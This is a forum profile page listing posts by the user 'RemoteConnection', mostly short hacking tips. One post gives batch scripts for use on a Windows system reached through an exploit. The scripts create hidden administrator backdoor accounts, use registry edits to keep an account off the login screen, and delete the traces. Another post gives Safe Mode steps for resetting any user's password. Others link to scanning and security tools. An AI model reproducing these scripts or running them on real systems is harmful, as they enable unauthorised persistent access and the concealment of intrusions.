Jump to content
xisto Community

RemoteConnection

Members
  • Content Count

    109
  • Joined

  • Last visited

Everything posted by RemoteConnection

  1. Hi friends, what's your idea ? I thing If the attacker start attacking to linux, it would possibly to consider linux as vulnerable OS as windows .... many years that they're just breaking windows , isn't it ?
  2. well, u know Saint_Michael if you have access to a system just by cmd,like when u gained access to a system by today's exploits .... u only have command proment ////
  3. yea , that's right , a batch file , u know i just tried to explain it for a medium level user, but if it's needed to explain more , Sure
  4. Well, I don't know how to edit my post maybe the option is disable ... That's the working link : http://forums.xisto.com/no_longer_exists/
  5. when u have an access to a windows system by CMD , maybe u need to create an admin account with a remote cnnection,here's the way: @echo offnet user IUSR_WAN /add /expires:nevernet localgroup administrators /add IUSR_REMOTEnet user IUSR_WAN hermannet user IUSR_WAN /comment:"Built-in account for Remote Service"net user IUSR_WAN /fullname:"Remote Service Account" also another way that the user won't show on login screen! @echo offnet user illwill password /add && net localgroup administrators illwill /addecho Windows Registry Editor Version 5.00> c:\hide.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.regecho "illwill"=dword:00000000>> c:\hide.regREGEDIT /S c:\hide.REGDEL /Q c:\hide.REGExit
  6. SQLScan is a Windows GUI scanner tailored specifically to finding SQL servers that may be vulnerable to the recent SQL "Slammer" or "SQHell" worm that attacks vulnerable Microsoft SQL 2000 servers. SQLScan by foundstone http://forums.xisto.com/no_longer_exists/
  7. Find the tool INSTSRV.EXE, and download it to SYSTEM32 folder..Then type the command,INSTSRV <SERVICENAME> REMOVEI'll really happy if the attachment option is enabled...
  8. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86 platforms. Get It From : https://sourceforge.net/projects/nst/files/
  9. STEPS TO CHANGE/RESET PASSWORD FOR ANY USERNAME 1. Reboot the computer 2. Right after the bios is finished, hit F8 (or F2,10,12) 3. Select 'Safe mode' or 'Safe mode with networking support' 4. Windows will boot up to the logon screen. Click administrator, 9/10 there is no password. 5. Do, Start->Run->type 'command' 6. At the prompt, type 'net user' which will display a list of usernames. Find the one you are looking for, try 'net user username' for them all. Type 'net user /HELP' for more info. 7. To reset the password type 'net user username *' where username is the username you want to reset. 8. For no password, leave blank. 9. Now, reboot and you can login as that user.STEPS TO PROTECT YOURSELF FROM THIS METHOD 1. Log into your account (must have admin rights) 2. Get to a command prompt and type 'net user username *' where username is Administrator, or the renamed administrator account. 3. Give administrator a STRONG password. 4. Done.
×
×
  • Create New...

Important Information

Terms of Use | Privacy Policy | Guidelines | We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.